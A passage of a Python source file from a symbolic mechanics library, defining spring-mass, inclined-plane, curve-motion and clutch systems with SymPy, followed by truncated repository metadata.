obj._all_default_data(formatter=formatter)\n \n data=[formatter(elem) for elem in self.elements.values()]\n\n \n return {key:value for elem in data for key, value in elem.items()} \n \n def _components_numerical_data(self):\n \n data=[elem._all_numerical_data() for elem in self.elements.values()]\n \n \n return {key:value for elem in data for key, value in elem.items()} \n \n def _all_default_data(self,formatter=None):\n \n \n \n return {**self._components_default_data(formatter=formatter),**self.get_default_data()} \n \n def _all_numerical_data(self):\n \n return {**self._components_numerical_data(),**self.get_numerical_data()} \n \n \n def get_default_data(self,formatter=None):\n return {}\n\n def get_numerical_data(self):\n return {}\n\n def _params_summary(self):\n \n query = lambda obj: {key:'Param comes from '+obj.__class__.__name__ for key in obj._all_default_data().keys()}\n\n desc_dict={key:(val if isinstance(val,str) else 'Provided directly within class') for key,val in self._all_default_data( query ).items()}\n #desc_dict = self._all_default_data( query )\n\n return '\\n'.join([f'{key} - {value}' for key,value in desc_dict.items()])\n \n def _system_summary(self):\n \n\n\n return f'{self.system_description()}\\n {\"=\"*50} \\n {self._params_summary()}'\n \n def get_random_parameters(self):\n\n \n #print('preview for',self)\n #display(self._all_default_data())\n #display(self.get_default_data())\n \n default_data_dict = {**self._components_default_data(),**self.get_default_data()}\n\n if default_data_dict:\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n else:\n parameters_dict = None\n\n return parameters_dict\n\n def get_numerical_parameters(self):\n\n default_data_dict = {**self._components_numerical_data(),**self.get_numerical_data()}\n\n if default_data_dict:\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n else:\n parameters_dict = None\n\n return parameters_dict\n\n @property\n def _report_components(self):\n\n comp_list = [\n *REPORT_COMPONENTS_LIST\n ]\n\n return comp_list\n \n @lru_cache\n # def linearized(self,): #it was missing\n\n # return type(self).from_system(super().linearized())\n \n @lru_cache \n def linearized(self, x0=None, op_point=False, hint=[], label=None):\n\n #temporary workaround\n lin_sys = HarmonicOscillator(self).linearized(x0=x0,op_point=op_point,hint=hint,label=label)\n \n 
#old version\n        #lin_sys=super().linearized(x0=x0,op_point=op_point,hint=hint,label=label)\n        \n        return type(self).from_system(lin_sys)\n\n    def tensioner_belt_force(self):\n        return self.k_tensioner * self.steady_solution()\n\n    def left_belt_force(self):\n        return self.k_belt * self.steady_solution()\n\n    def right_belt_force(self):\n        return self.k_belt * self.steady_solution()\n\n\n#    def max_static_force_pin(self):\n#        return abs(self.static_load().doit()[0])\n\n#    def max_dynamic_force_pin(self):\n#        return self.frequency_response_function() * self.stiffness_matrix(\n#        )[0] + self.max_static_force_pin()\n\n    def max_static_force_pin(self):\n        return abs(self.static_load().doit()[0]) / 2\n\n    def max_dynamic_force_pin(self):\n        return self._frf()[0] * self.k_m + self.max_static_force_pin()\n\n    def static_force_pin_diameter(self):\n        kt = Symbol('k_t', positive=True)\n        Re = Symbol('R_e', positive=True)\n        return ((4 * self.max_static_force_pin()) / (pi * kt * Re))**(1 / 2)\n\n    def dynamic_force_pin_diameter(self):\n        kt = Symbol('k_t', positive=True)\n        Re = Symbol('R_e', positive=True)\n        return ((4 * self.max_dynamic_force_pin()) / (pi * kt * Re))**(1 / 2)\n\n    def _parameter_influence_analysis(self,parameter=None,param_span=None,dependencies_dict=None):\n\n        from ...solvers.linear import ODESystem\n        from ...utilities.adaptable import NumericalAnalysisDataFrame,TimeDataFrame,pd\n\n        if parameter is None:\n            parameter = self.system_parameters()[0]\n\n        if param_span is None:\n            param_span = [0.8,1,1.2]\n\n        if dependencies_dict is None:\n            dependencies_dict = {}\n\n        reference_data = {**self.get_numerical_parameters()}\n        display(reference_data)\n\n#        eom = self._eoms[0]\n        #system = ODESystem(odes=eom,dvars=self.q).as_first_ode_linear_system()\n        #system = ODESystem(odes=eom,dvars=self.q,ode_order=2)#.numerized()\n        system = self._ode_system\n        \n        \n        \n        Y = list(self.Y) + list(dependencies_dict.keys())\n\n        index = pd.Index(np.linspace(0,100,1000),name=self.ivar)\n\n        df_num = NumericalAnalysisDataFrame(index=index).from_model(system,\n                                                                    parameter=parameter,\n                                                                    span=param_span,\n                                                                    reference_data=reference_data,\n                                                                    coordinates=Y,\n                                                                    index=index)\n\n        results_num = df_num#.perform_simulations(model_level_name=0,dependencies=dependencies_dict)\n        #results = TimeDataFrame(results_num).droplevel(0,axis=1)\n        results = results_num\n        \n        return results\n        \n    def get_reference_data(self):\n        \n        return self.get_numerical_parameters()\n\n\nclass NonlinearComposedSystem(ComposedSystem):\n\n    def frequency_response_function(self,\n                                    frequency=Symbol('Omega', positive=True),\n                                    amplitude=Symbol('a')):\n\n        omega = (self.linearized()).natural_frequencies()[0]\n        \n        \n        eps = self.small_parameter()\n\n        exciting_force = self.external_forces()[0]\n\n        comps = exciting_force.atoms(sin, cos)\n        exciting_amp = sum([exciting_force.coeff(comp) for comp in comps])\n        inertia = self.inertia_matrix()[0]\n\n        return amplitude * (-frequency**2 + omega**2) * inertia + S(\n            3) / 4 * eps * amplitude**3 - exciting_amp\n\n    def amplitude_from_frf(self, amplitude=Symbol('a')):\n\n        return solveset(self.frequency_response_function(), amplitude)\n\n    @property\n    def _report_components(self):\n\n        comp_list = [\n            *REPORT_COMPONENTS_LIST\n        ]\n\n        return comp_list\n\n    def 
max_static_force_pin(self):\n        return abs(self.static_load().doit()[0]) / 2\n\n    def max_dynamic_force_pin(self):\n        lin_sys = ComposedSystem(self.linearized())\n        #k_m = self._given_data[self.k_m]\n        k_m = self.k_m\n        #        display(lin_sys.stiffness_matrix()[0])\n\n        return lin_sys.frequency_response_function() * (\n            lin_sys.stiffness_matrix()[0]) / 2 + self.max_static_force_pin()\n\n    def max_dynamic_nonlinear_force_pin(self):\n        lin_sys = ComposedSystem(self.linearized())\n\n        amp = list(self.amplitude_from_frf())\n        display(amp)\n        #k_m = self._given_data[self.k_m]\n        k_m = self.k_m\n\n        return amp[0] * k_m + self.max_static_force_pin()\n    \n    \nclass SpringMassSystem(ComposedSystem):\n    \"\"\"Ready to use sample Single Degree of Freedom System with mass on spring\n        Arguments:\n        =========\n            m = Mass\n                -Mass of system on spring\n\n            k = Spring coefficient\n                -Spring carrying the system\n\n            ivar = symbol object\n                -Independent time variable\n\n            qs = dynamicsymbol object\n                -Generalized coordinates\n\n        Example\n        =======\n        A mass oscillating up and down while being held up by a spring with a spring constant k\n\n        >>> t = symbols('t')\n        >>> m, k = symbols('m, k')\n        >>> qs = dynamicsymbols('z') # Generalized Coordinates\n        >>> mass = SDoFHarmonicOscillator(m,k, qs=[z],) # Initialization of LagrangesDynamicSystem instance\n\n        -We define the symbols and dynamicsymbols\n        -Kinetic energy T and potential energy V are evaluated to calculate the Lagrangian L\n        -Reference frame was created with point P defining the position and the velocity determined on the z axis\n        -External forces are assigned\n        -Next we determine the instance of the system using class LagrangeDynamicSystem\n        -We call out the instance of the class\n        -If necessary assign values for the default arguments\n\n\n    \"\"\"\n    scheme_name = 'engine.png'\n    real_name = 'engine_real.PNG'\n\n    m=Symbol('m', positive=True)\n    k=Symbol('k', positive=True)\n    ivar=Symbol('t')\n    \n    z=dynamicsymbols('z')\n    \n    def __init__(self,\n                 m=None,\n                 k=None,\n                 z=None,\n                 ivar=None,\n                 **kwargs):\n\n        \n        \n        if m is not None: self.m = m\n        if k is not None: self.k = k\n        if ivar is not None: self.ivar = ivar\n        if z is not None: self.z = z\n        \n        \n        self.qs = [self.z]\n\n        self._init_from_components(**kwargs)\n\n    @property\n    def components(self):\n\n        components = {}\n        \n        self.material_point = MaterialPoint(self.m, self.z, qs=self.qs)\n        self.spring = Spring(self.k, self.z, qs=self.qs)\n        \n        components['material_point'] = self.material_point\n        components['spring'] = self.spring\n        \n        return components\n    \n    def symbols_description(self):\n        self.sym_desc_dict = {\n            self.m: r'mass of system on the spring',\n            self.k: r'Spring coefficient ',\n        }\n\n        return self.sym_desc_dict\n\n\nclass LagrangeIBlocksOnInclinedPlane(ComposedSystem):\n    scheme_name = 'ddof_disks_3_springs_scheme.png'\n    real_name = 'nonlin_trolley_real.PNG'\n\n    def __init__(self,\n                 m=Symbol('m', positive=True),\n                 m1=Symbol('m_1', positive=True),\n                 m2=Symbol('m_2', positive=True),\n                 m3=Symbol('m_3', positive=True),\n                 m4=Symbol('m_4', positive=True),\n                 R=Symbol('R', positive=True),\n                 g=Symbol('g', positive=True),\n                 alpha=Symbol('alpha',positive=True),\n                 beta=Symbol('beta',positive=True),\n                 ivar=Symbol('t'),\n                 x1=dynamicsymbols('x_1'),\n                 x2=dynamicsymbols('x_2'),\n                 x3=dynamicsymbols('x_3'),\n                 x4=dynamicsymbols('x_4'),\n                 phi=dynamicsymbols('\\\\varphi'),\n                 qs=dynamicsymbols('x_1, x_2, x_3, x_4, \\\\varphi'),\n                 **kwargs):\n\n        self.m = m\n        self.m1 = m1\n        self.m2 = m2\n        self.m3 = m3\n        self.m4 = m4\n        self.R = R\n        self.g = g\n        self.alpha = alpha\n        self.beta 
= beta\n self.x1 = x1\n self.x2 = x2\n self.x3 = x3\n self.x4 = x4\n self.phi = phi\n self.qs = qs\n\n\n #IMROVE\n self._init_from_components(**kwargs)\n \n @property\n def components(self):\n\n ######## ELEMENTS MOVED FROM __init__ METHOD\n self.Mass1 = MaterialPoint(self.m1, pos1=self.x1, qs=[self.x1]) + GravitationalForce(self.m1, self.g, pos1=-self.x1*sin(self.alpha), qs=[self.x1])\n self.Mass2 = MaterialPoint(self.m2, pos1=self.x2, qs=[self.x2]) + GravitationalForce(self.m2, self.g, pos1=-self.x2*sin(self.alpha), qs=[self.x2])\n self.Mass3 = MaterialPoint(self.m3, pos1=self.x3, qs=[self.x3]) + GravitationalForce(self.m3, self.g, pos1=-self.x3*sin(self.beta), qs=[self.x3])\n self.Mass4 = MaterialPoint(self.m4, pos1=self.x4, qs=[self.x4]) + GravitationalForce(self.m4, self.g, pos1=-self.x4*sin(self.beta), qs=[self.x4])\n self.Pulley = MaterialPoint(1/2*self.m*self.R**2, pos1=self.phi, qs=[self.phi])\n\n ####################\n\n components = {}\n\n components['Mass1'] = self.Mass1\n components['Mass2'] = self.Mass2\n components['Mass3'] = self.Mass3\n components['Mass4'] = self.Mass4\n components['Pulley'] = self.Pulley\n \n return components\n \n def get_default_data(self):\n\n m0 = symbols('m_0', positive=True)\n\n default_data_dict = {\n self.m: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m1: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m2: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m3: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m4: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n }\n\n return default_data_dict\n\n def get_random_parameters(self):\n\n default_data_dict = self.get_default_data()\n\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n\n return parameters_dict\n\n \n#TODO 159\nclass LagrangeIOnMathFunction(ComposedSystem):\n\n scheme_name = 'mat_point_parabola.PNG'\n real_name = 'tautochrone_curve_small.gif'\n\n \n \n \n def __init__(self,\n m=Symbol('m', positive=True),\n g=Symbol('g', positive=True),\n x=dynamicsymbols('x'),\n y=dynamicsymbols('y'),\n a=symbols('a',positive=True),\n R=symbols('R',positive=True),\n ivar=Symbol('t'),\n qs=dynamicsymbols('x,y'),\n **kwargs):\n\n self.m = m\n self.x = x\n self.y = y\n self.a = a\n self.R = R\n self.g = g\n\n system = HarmonicOscillator(S.Half*m*x.diff(ivar)**2+S.Half*m*y.diff(ivar)**2-m*g*y,qs=[x,y])\n\n super().__init__(system(qs),**kwargs)\n\n def get_default_data(self):\n\n\n m0 = symbols('m_0', positive=True)\n x = self.x\n a, Omega = symbols('a, Omega', positive=True)\n\n default_data_dict = {\n self.m :[S.Half * m0, 1 * m0, 2 * m0, 2**2 * m0, S.Half**2 * m0,8*m0,S.Half**3],\n self.y:[ a*x**2, a*(1-cos(x)),a*sin(x)**2,a*sin(x)**4,a*x**4]\n\n }\n\n return default_data_dict\n \n\n\n\n\n#Old MaterialPointMovement system, new system implemented.\n#This class is left just for an example.\nclass ExemplaryOldImplementedSystem(ComposedSystem):\n\n m = Symbol('m', positive=True)\n g = Symbol('g', positive=True)\n c = Symbol('c', positive=True)\n r = Symbol('r', positive=True)\n phi = dynamicsymbols('\\\\varphi')\n\n c0 = Symbol('c0', positive=True)\n r0 = Symbol('r0', positive=True)\n phi0 = dynamicsymbols('phi0')\n\n def __init__(self,\n m=None,\n g=None,\n c=None,\n r=None,\n phi=None,\n ivar=Symbol('t'),\n **kwargs):\n\n if m is not None: self.m = m\n if g is not None: self.g = g\n if c is not None: self.c = c\n if r is not None: self.r = r\n if phi is not None: self.phi = phi\n 
self.ivar = ivar\n\n self.qs = [self.phi]\n\n self._mass_x = MaterialPoint(self.m,\n pos1=self.r * sin(self.phi),\n qs=self.qs)\n self._mass_y = MaterialPoint(self.m,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n self._gravity_ = GravitationalForce(self.m,\n self.g,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n composed_system = self._mass_x + self._mass_y + self._gravity_\n\n super().__init__(composed_system, **kwargs)\n\n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Mass',\n self.g: r'Gravity constant',\n self.c: r'',\n }\n\n return self.sym_desc_dict\n\n def get_default_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n \n def get_numerical_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n\n def max_static_force(self):\n return S.Zero\n\n def max_dynamic_force(self):\n return S.Zero\n\n#DONE \nclass MaterialPointMovement(ComposedSystem):\n\n m = Symbol('m', positive=True)\n g = Symbol('g', positive=True)\n c = Symbol('c', positive=True)\n r = Symbol('r', positive=True)\n phi = dynamicsymbols('phi')\n\n c0 = Symbol('c0', positive=True)\n r0 = Symbol('r0', positive=True)\n phi0 = dynamicsymbols('phi0')\n\n def __init__(self,\n m=None,\n g=None,\n c=None,\n r=None,\n phi=None,\n ivar=Symbol('t'),\n **kwargs):\n\n if m is not None: self.m = m\n if g is not None: self.g = g\n if c is not None: self.c = c\n if r is not None: self.r = r\n if phi is not None: self.phi = phi\n self.ivar = ivar\n\n self.qs = [self.phi]\n\n self._init_from_components(**kwargs)\n\n @property\n def components(self):\n\n components = {}\n\n\n self._mass_x = MaterialPoint(self.m,\n pos1=self.r * sin(self.phi),\n qs=self.qs)\n self._mass_y = MaterialPoint(self.m,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n self._gravity = GravitationalForce(self.m,\n self.g,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n\n\n components['_mass_x']=self._mass_x\n components['_mass_y']=self._mass_y\n components['_gravity']=self._gravity\n\n\n return components\n \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Mass',\n self.g: r'Gravity constant',\n self.c: r'',\n }\n\n return self.sym_desc_dict\n\n def get_default_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n \n def get_numerical_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict \n\n def max_static_force(self):\n return S.Zero\n\n def max_dynamic_force(self):\n return S.Zero\n\n \n#Kuba #poprawione \n\nclass KinematicClutchWithSprings(ComposedSystem):\n #scheme_name = ''\n #real_name = ''\n #detail_scheme_name = 
''\n #detail_real_name = ''\n\n l0 = Symbol('l_0', positive=True)\n G = Symbol('G', positive=True)\n I = Symbol('I', positive=True)\n l_1 = Symbol('l_1', positive=True)\n l_2 = Symbol('l_2', positive=True)\n I_1 = Symbol('I_1', positive=True)\n I_2 = Symbol('I_2', positive=True)\n Ms = Symbol('M_s', positive=True)\n Omega = Symbol('Omega', positive=True)\n ivar=Symbol('t')\n theta = dynamicsymbols('theta')\n phi = dynamicsymbols('\\\\varphi')\n\n def __init__(self,\n l0=None,\n G=None,\n I=None,\n l_1=None,\n l_2=None,\n I_1=None,\n I_2=None,\n Ms=None,\n phi=None,\n theta=None,\n ivar=Symbol('t'),\n qs=None,\n **kwargs):\n \n if G is not None: self.G = G\n if I is not None: self.I = I\n if Ms is not None: self.Ms = Ms\n if l_1 is not None: self.l_1 = l_1\n if l_2 is not None: self.l_2 = l_2\n if I_1 is not None: self.I_1 = I_1\n if I_2 is not None: self.I_2 = I_2\n if phi is not None: self.phi = phi\n if theta is not None: self.theta = theta\n\n self.qs = [self.phi]\n self.ivar = ivar\n self._init_from_components(**kwargs)\n \n @cached_property\n def components(self):\n components = {}\n \n self.k_1 = (self.G * self.I_1) / self.l_1\n self.k_2 = (self.G * self.I_2) / self.l_2\n\n self.disc_1 = Disk(self.I, pos1=self.phi, qs=self.qs)\n self.spring_2 = Spring(self.k_1 * self.k_2 / (self.k_2 + self.k_1),\n pos1=self.phi,\n pos2=self.theta,\n qs=self.qs) #right spring\n self.moment = Force(self.Ms, pos1=self.phi, qs=self.qs)\n \n components['moment'] = self.moment\n components['disc_1'] = self.disc_1\n components['spring_2'] = self.spring_2\n \n return components\n\n\n def symbols_description(self):\n self.sym_desc_dict = {\n self.I: r'Moment of Inertia',\n self.k_1: r'',\n self.k_2: r'',\n }\n return self.sym_desc_dict\n def get_default_data(self):\n\n m0, l0, G, l = symbols('m_0 l_0 G l', positive=True)\n theta0, Omega = symbols('theta_0, Omega', positive=True)\n\n default_data_dict = {\n self.I: [S.Half * m0 * (l0**2) * no for no in range(1, 3)],\n self.I_1: [S.Half**(no) * (l0**4) for no in range(1, 8)],\n self.I_2: [S.Half**no * (l0**4) for no in range(1, 8)],\n self.l_1: [S.Half**(no - 6) * l0 for no in range(1, 8)],\n self.l_2: [S.Half**(no - 6) * l0 for no in range(1, 8)],\n self.theta: [theta0 * cos(Omega * self.ivar)],\n }\n\n return default_data_dict\n\n def disc_force(self):\n t = self.ivar\n return self.I * self.steady_solution().diff(t, t)\n\n def max_static_force_pin(self):\n d = Symbol('d', positive=True)\n return 2 * self.Ms / d\n\n def max_dynamic_force_pin(self):\n d = Symbol('d', positive=True)\n return self.frequency_response_function(\n self.natural_frequencies()[0]) * self.stiffness_matrix()[0]\n\n def max_static_bearing_force(self):\n d = Symbol('d', positive=True)\n return abs(2 * self.static_load()[0] / d)\n\n def max_dynamic_bearing_force(self):\n d = Symbol('d', positive=True)\n acc_amp = self.frequency_response_function() * self.Omega**2\n\n return abs(\n 2 * (self.I * acc_amp) /\n d) + self.max_static_bearing_force() #.subs(self._given_data)\n\n def static_key_length(self):\n kd = Symbol('k_d', positive=True)\n h = Symbol('h', positive=True)\n return (2 * self.max_static_bearing_force()) / (kd * h)\n\n def dynamic_key_length(self):\n\n kd = Symbol('k_d', positive=True)\n h = Symbol('h', positive=True)\n return (2 * self.max_dynamic_bearing_force()) / (kd * h) ", "repo_name": "bogumilchilinski/dynpy", "sub_path": "models/mechanics/principles.py", "file_name": "principles.py", "file_ext": "py", "file_size_in_byte": 30086, "program_lang": "python", "lang": "en", 
"doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dynamics.mech_comp.TitlePageComponent", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 26, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.SchemeComponent", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 27, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.ExemplaryPictureComponent", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 28, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergyComponent", "line_number": 29, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 29, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergyDynPyCodeComponent", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 30, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergySymPyCodeComponent", "line_number": 31, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 31, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergyComponent", "line_number": 32, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 32, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergyDynPyCodeComponent", "line_number": 33, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 33, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergySymPyCodeComponent", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 34, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.LagrangianComponent", "line_number": 35, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 35, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationComponent", "line_number": 36, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 36, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationDynpyCodeComponent", "line_number": 37, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 37, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationSympyCodeComponent", "line_number": 38, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 38, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.FundamentalMatrixComponent", "line_number": 39, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 39, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionComponent", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 40, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionDynpyCodeComponent", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 41, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionSympyCodeComponent", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 42, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.SteadySolutionComponent", "line_number": 43, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 43, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.FreeVibrationFrequencyComponent", "line_number": 44, "usage_type": 
"attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 44, "usage_type": "name"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 55, "usage_type": "name"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 69, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 71, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 72, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 73, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 74, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 75, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 111, "usage_type": "argument"}, {"api_name": "elements.MaterialPoint", "line_number": 152, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 152, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 178, "usage_type": "call"}, {"api_name": "IPython.display.Image", "line_number": 181, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 181, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 181, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 243, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 257, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 283, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 274, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 279, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 314, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 315, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 316, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 319, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 320, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 321, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 322, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 323, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 326, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 327, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 328, "usage_type": "name"}, {"api_name": "utilities.adaptable.pd.Index", "line_number": 356, "usage_type": "call"}, {"api_name": "utilities.adaptable.pd", "line_number": 356, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 356, "usage_type": "call"}, {"api_name": "utilities.adaptable.NumericalAnalysisDataFrame", "line_number": 358, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 379, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 380, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 389, "usage_type": "argument"}, {"api_name": "sympy.cos", "line_number": 389, "usage_type": "argument"}, {"api_name": "sympy.S", "line_number": 393, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 396, "usage_type": "call"}, {"api_name": "sympy.solveset", "line_number": 398, "usage_type": "call"}, {"api_name": "{'ODESystem': 'solvers.linear.ODESystem', 'NumericalAnalysisDataFrame': 'utilities.adaptable.NumericalAnalysisDataFrame', 'TimeDataFrame': 'utilities.adaptable.TimeDataFrame', 'pd': 'utilities.adaptable.pd'}", "line_number": 413, "usage_type": "call"}, {"api_name": "{'ODESystem': 'solvers.linear.ODESystem', 
'NumericalAnalysisDataFrame': 'utilities.adaptable.NumericalAnalysisDataFrame', 'TimeDataFrame': 'utilities.adaptable.TimeDataFrame', 'pd': 'utilities.adaptable.pd'}", "line_number": 422, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 470, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 471, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 472, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 474, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 500, "usage_type": "call"}, {"api_name": "elements.Spring", "line_number": 501, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 522, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 523, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 524, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 525, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 526, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 527, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 528, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 529, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 530, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 531, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 532, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 533, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 534, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 535, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 536, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 537, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 564, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 564, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 564, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 565, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 565, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 565, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 566, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 566, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 566, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 567, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 567, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 567, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 568, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 584, "usage_type": "call"}, {"api_name": 